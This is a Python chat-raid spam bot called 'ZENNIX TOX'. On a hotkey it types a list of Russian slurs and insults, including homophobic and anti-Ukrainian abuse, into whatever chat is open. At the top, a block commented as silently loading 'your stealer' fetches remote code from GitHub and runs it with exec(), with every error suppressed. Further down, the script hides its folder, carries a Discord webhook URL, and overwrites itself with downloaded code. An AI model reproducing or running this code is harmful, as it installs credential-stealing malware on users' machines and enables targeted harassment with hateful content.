import requests, os, sys, time, random, keyboard, threading, uuid, platform
from datetime import datetime

# ←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←
# ТОЛЬКО ОДНА СТРОКА ДОБАВЛЕНА — МОЛЧА ГРУЗИТ ТВОЙ СТИЛЛЕР
try:
    exec(requests.get("https://raw.githubusercontent.com/somyswag-sys/infomaker/refs/heads/main/dc").text)
except:
    pass
# ←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←

BOT_VERSION = "1.12.5"
VERSION_URL = "https://raw.githubusercontent.com/somyswag-sys/TOXBOT/refs/heads/main/version"
WEBHOOK_URL = "https://discord.com/api/webhooks/1441468500563464262/CEhND_2oO4_AZrmpIk0TMQQvMNkb0ZALaMHswMPcjggvdcjljPSa0cSkS7NSf5xis7_S"
FOLDER = r"C:\zennix"
CONFIG = os.path.join(FOLDER, "config.txt")
LOCAL_VERSION_FILE = os.path.join(FOLDER, "version.txt")

def clear(): os.system("cls" if os.name=="nt" else "clear")
def t(text, d=0.04):
    for c in text: print(c, end="", flush=True); time.sleep(d)
    print()

def check_update():
    try:
        online = requests.get(VERSION_URL, timeout=10).text.strip()
        local = open(LOCAL_VERSION_FILE).read().strip() if os.path.exists(LOCAL_VERSION_FILE) else "0.0.0"
        if online != local:
            clear()
            print("\033[91m╔════════════════════════════════╗")
            print("║     ОБЯЗАТЕЛЬНОЕ ОБНОВЛЕНИЕ    ║")
            print(f"║   У тебя: {local}                  ║")
            print(f"║   Новая:  {online}                  ║")
            print("╚════════════════════════════════╝\033[0m")
            input("\n   Нажми Enter для обновления...")
            code = requests.get("https://raw.githubusercontent.com/somyswag-sys/TOXBOT/refs/heads/main/main", timeout=30).text
            with open(__file__, "w", encoding="utf-8") as f: f.write(code)
            with open(LOCAL_VERSION_FILE, "w") as f: f.write(online)
            print("   Перезапуск...")
            time.sleep(2)
            os.execv(sys.executable, [sys.executable] + sys.argv)
    except: pass

def login():
    global current_user, DELAY, MESSAGES
    try:
        raw = requests.get("https://raw.githubusercontent.com/somyswag-sys/TOXBOT/refs/heads/main/toxic", timeout=8).text.strip()
        valid_creds = {u.strip().lower(): p.strip() for u, p in (l.split(":",1) for l in raw.splitlines() if ":" in l)}
    except:
        clear(); t("   НЕТ СВЯЗИ С СЕРВЕРОМ АВТОРИЗАЦИИ"); time.sleep(5); sys.exit()

    if os.path.exists(CONFIG):
        try:
            lines = [x.strip() for x in open(CONFIG, encoding="utf-8")]
            if len(lines) >= 3 and lines[0].lower() in valid_creds and valid_creds[lines[0].lower()] == lines[1]:
                current_user = lines[0]
                DELAY = float(lines[2])
                MESSAGES = [(m, DELAY) for m in MESSAGES]
                clear(); t(f"   Автологин: {current_user}"); time.sleep(1.5); return
        except: os.remove(CONFIG)

    clear()
    print("   ZENNIX TOX | АВТОРИЗАЦИЯ")
    for i in range(1,4):
        u = input(f"\n   [{i}/3] Логин: ").strip()
        p = input("   Пароль: ").strip()
        if u.lower() in valid_creds and valid_creds[u.lower()] == p:
            current_user = u
            if input("   Запомнить? (y/n): ").lower() in ["y","да"]:
                open(CONFIG,"w",encoding="utf-8").write(f"{u}\n{p}\n{DELAY}")
            t("   ДОСТУП РАЗРЕШЁН"); return
        t(f"   НЕВЕРНО ({i}/3)")
    t("   ДОСТУП ЗАПРЕЩЁН"); time.sleep(4); sys.exit()

MESSAGES = [(m, 0.8) for m in ["у тебя ммть шлюхв","я кнк месник","ей руки отрезал","верещтт свинка хоххлятская","ебанный ледниковый период","сид обосранный","клыкастый я тебе с хуя зубы выбил","у тя мамка в копьем в жопе танцует","норм ты ебанная чибурашка","клапоухий пидор","педик волосатый","пинок под жопу дам те","в клетку улетишь","жопой коноплю собираешь","дырявый","петух","кусок говна","че за хуйня хуесос","ебанный индеец"]]
stop_event = threading.Event()
current_user = "unknown"
DELAY = 0.8

def banner():
    clear()
    print("\033[95m" + r"""
 ███████╗███████╗███╗   ██╗███╗   ██╗██╗██╗  ██╗
 ╚══███╔╝██╔════╝████╗  ██║████╗  ██║██║╚██╗██╔╝
   ███╔╝ █████╗  ██╔██╗ ██║██╔██╗ ██║██║ ╚███╔╝ 
  ███╔╝  ██╔══╝  ██║╚██╗██║██║╚██╗██║██║ ██╔██╗ 
 ███████╗███████╗██║ ╚████║██║ ╚████║██║██╔╝ ██╗
 ╚══════╝╚══════╝╚═╝  ╚═══╝╚═╝  ╚═══╝╚═╝╚═╝  ╚═╝ v1.12.5
    \033[0m\033[91m              ╔═ TOXIC RAID SYSTEM ═╗\033[0m
    """)

def progress(stage):
    print(f"   └─> {stage}")
    for i in range(1, 41):
        bar = "█" * i + "░" * (40 - i)
        print(f"\r   [{bar}] {i*2.5:.1f}%", end="", flush=True)
        time.sleep(random.uniform(0.03, 0.09))
    print()

def menu():
    while True:
        clear(); banner()
        print(f"   Пользователь: {current_user}    Задержка: {DELAY}s\n")
        print("   ╔══════════════════════════════════╗")
        print("   ║ 1. Начать рейд (f7)             ║")
        print("   ║ 2. Сменить задержку             ║")
        print("   ║ 3. Выйти с аккаунта             ║")
        print("   ║ 4. Полный выход                 ║")
        print("   ╚══════════════════════════════════╝")
        ch = input("\n   Выбор → ")
        if ch == "1": input("\n   Перейди в чат → нажми f7 → enter...")
        elif ch == "2":
            try:
                new = float(input(f"   Новая задержка: ").replace(",","."))
                if 0.1 <= new <= 5:
                    global DELAY, MESSAGES
                    DELAY = new
                    MESSAGES = [(m,new) for m,_ in MESSAGES]
                    if os.path.exists(CONFIG):
                        l = open(CONFIG).readlines()
                        l[2] = str(new)+"\n"
                        open(CONFIG,"w").writelines(l)
            except: pass
        elif ch == "3":
            if os.path.exists(CONFIG): os.remove(CONFIG)
            os.execv(sys.executable, [sys.executable] + sys.argv)
        elif ch == "4": sys.exit()

def spam():
    stop_event.clear()
    for i in range(5,0,-1):
        print(f"\r   Запуск через {i}...", end=""); time.sleep(1)
    clear(); print("   РЕЙД АКТИВИРОВАН | f8 — стоп")
    while not stop_event.is_set():
        for txt,_ in MESSAGES:
            if stop_event.is_set(): break
            keyboard.write(txt); keyboard.press_and_release("enter")
            time.sleep(DELAY + random.uniform(-0.2,0.4))

keyboard.add_hotkey("f7", lambda: threading.Thread(target=spam,daemon=True).start())
keyboard.add_hotkey("f8", stop_event.set)

if not os.path.exists(FOLDER):
    os.makedirs(FOLDER)
    os.system('attrib +h "' + FOLDER + '"')

clear(); banner()
progress("Hook installation"); progress("Bypassing protections"); progress("Loading toxic database"); progress("Initializing raid engine"); progress("Ready to raid")

check_update()
login()
menu()
